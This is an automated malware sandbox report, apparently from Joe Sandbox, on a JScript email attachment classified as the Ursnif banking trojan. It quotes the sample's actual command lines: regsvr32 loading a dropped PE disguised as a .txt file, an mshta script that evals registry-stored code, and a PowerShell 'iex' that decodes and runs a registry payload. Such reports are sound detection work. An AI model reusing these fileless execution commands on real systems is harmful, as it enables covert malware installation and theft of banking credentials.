Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507CA3E GetProcAddress,NtCreateSection,memset,3_2_0507CA3E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507A27A NtQueryInformationProcess,3_2_0507A27A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050702DF NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_050702DF
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05064D66 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,3_2_05064D66
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507C7BD NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,3_2_0507C7BD
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05077933 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_05077933
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05074968 memset,memcpy,LdrInitializeThunk,NtSetContextThread,RtlNtStatusToDosError,GetLastError,3_2_05074968
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506A99C NtGetContextThread,RtlNtStatusToDosError,3_2_0506A99C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507B07A NtQuerySystemInformation,RtlNtStatusToDosError,3_2_0507B07A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050773D6 memset,NtQueryInformationProcess,3_2_050773D6
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050693F0 CreateProcessAsUserA,3_2_050693F0
Detected potential crypto functionShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_727225443_2_72722544
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05086D183_2_05086D18
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05081D5A3_2_05081D5A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050815703_2_05081570
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05066F343_2_05066F34
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506CF553_2_0506CF55
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050727783_2_05072778
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05073F8C3_2_05073F8C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050826133_2_05082613
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05072EDE3_2_05072EDE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050910A23_2_050910A2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050710DE3_2_050710DE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506DB4A3_2_0506DB4A
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\PGpPBocoGo.txt 216371A4A1B99CA2A47C2CDC6EF67995B0D8095E0D5AE193146A0B5B9FE8FB3A
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: open_attach_n2k.jsInitial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.winJS@19/18@4/1
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05076887 CloseHandle,LdrInitializeThunk,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,3_2_05076887
Creates files inside the user directoryShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\{03FAF906-86D7-2D49-A8E7-1AB15C0BEE75}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1392:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\DDdNGtqHaD.nfdQyjXrtbJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Reads ini filesShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: open_attach_n2k.jsVirustotal: Detection: 25%
Sample might require command line argumentsShow sources
Source: regsvr32.exeString found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\open_attach_n2k.js'
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txt
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txt
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5344 CREDAT:17410 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5344 CREDAT:82952 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5344 CREDAT:82960 /prefetch:2
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txtJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txtJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5344 CREDAT:17410 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5344 CREDAT:82952 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5344 CREDAT:82960 /prefetch:2Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Reads internet explorer settingsShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Submission file is bigger than most known malware samplesShow sources
Source: open_attach_n2k.jsStatic file information: File size 1691178 > 1048576
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000003.00000003.1488789608.0000000005800000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000003.00000003.1488789608.0000000005800000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 0000000F.00000002.1505371254.00000184265BC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000000F.00000002.1505371254.00000184265BC000.00000004.00000040.sdmp
Source: Binary string: c:\All\Cloud\Stay\case\Dance\Took\Figureparagraph.pdb source: regsvr32.exe, PGpPBocoGo.txt.0.dr

Data Obfuscation:

barindex
JScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txt");
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))Jump to behavior
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05076450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,3_2_05076450
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72722533 push ecx; ret 3_2_72722543
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_727224E0 push ecx; ret 3_2_727224E9
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05086D07 push ecx; ret 3_2_05086D17
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050869A0 push ecx; ret 3_2_050869A9
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0508BA4E push ds; retn 0002h3_2_0508BA69
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0508BA74 push edx; retn 0002h3_2_0508BA75
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0508BA98 push edx; ret 3_2_0508BAAD

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\PGpPBocoGo.txtJump to dropped file
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\PGpPBocoGo.txtJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000003.00000003.1353644779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354092603.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354065367.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353849678.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353529951.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1397537618.0000000004C9B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353755956.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353937634.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354012081.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 5160, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3660, type: MEMORY
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
